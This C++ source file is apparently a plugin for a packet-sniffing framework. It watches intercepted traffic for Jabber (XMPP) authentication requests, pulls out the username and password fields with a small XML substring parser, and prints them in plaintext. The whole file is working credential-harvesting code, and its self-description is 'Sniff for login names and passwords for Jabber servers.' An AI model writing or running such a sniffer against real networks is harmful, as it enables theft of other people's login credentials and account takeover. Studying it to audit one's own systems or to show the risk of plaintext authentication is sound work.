#include <stdio.h>
#include <stdlib.h>
#include "iplugin.h"


/**
 *  This plugin is designed to dump Jabber login attempts.
 *
 */
class CJabberPlugin: public IPlugin
{
 public:

  CJabberPlugin();
  ~CJabberPlugin();

  virtual void processPacket( const char *src, const char *dst, connection *currentConnection );
  virtual std::string getAuthor();
  virtual std::string getDescription();
  std::string getXMLTag( std::string name, char *buffer );

};


CJabberPlugin::CJabberPlugin()
{
}


CJabberPlugin::~CJabberPlugin()
{
}

std::string CJabberPlugin::getXMLTag( std::string name, char *buffer )
{
  char *start = NULL;
  char *end   = NULL;

  std::string open  = "<" + name + ">";
  std::string close = "</" + name + ">";

  /* 
   * Find start
   */
  start = strstr( buffer, open.c_str() );
  if ( start == NULL )
  {
    return "";
  }
  start += strlen( open.c_str() );

  /*
   * Find end
   */
  end = strstr( start, close.c_str() );
  if ( end == NULL )
  {
    return "";
  }

  char *mid = start;
  std::string val = "";
  while( mid < end )
    {
      val += mid[0];
      mid += 1;
    }

  return( val );

}

void CJabberPlugin::processPacket(const char *src, const char *dst, connection *currentConnection )
{
  if ( strstr( currentConnection->buf, "jabber:iq:auth" ) != NULL )
    {
      std::string user = getXMLTag( "username", currentConnection->buf );
      std::string pass = getXMLTag( "password", currentConnection->buf );
      printf("User: %20s Pass: %20s\n", user.c_str(), pass.c_str() );
    }
}

std::string CJabberPlugin::getAuthor()
{
  return( "Steve Kemp" );
}

std::string CJabberPlugin::getDescription()
{
	return( "Sniff for login names and passwords for Jabber servers." );
}


/**
 * Create a new instance of this plugin object.
 */
extern "C" IPlugin *factory()
{
  return new CJabberPlugin();
};
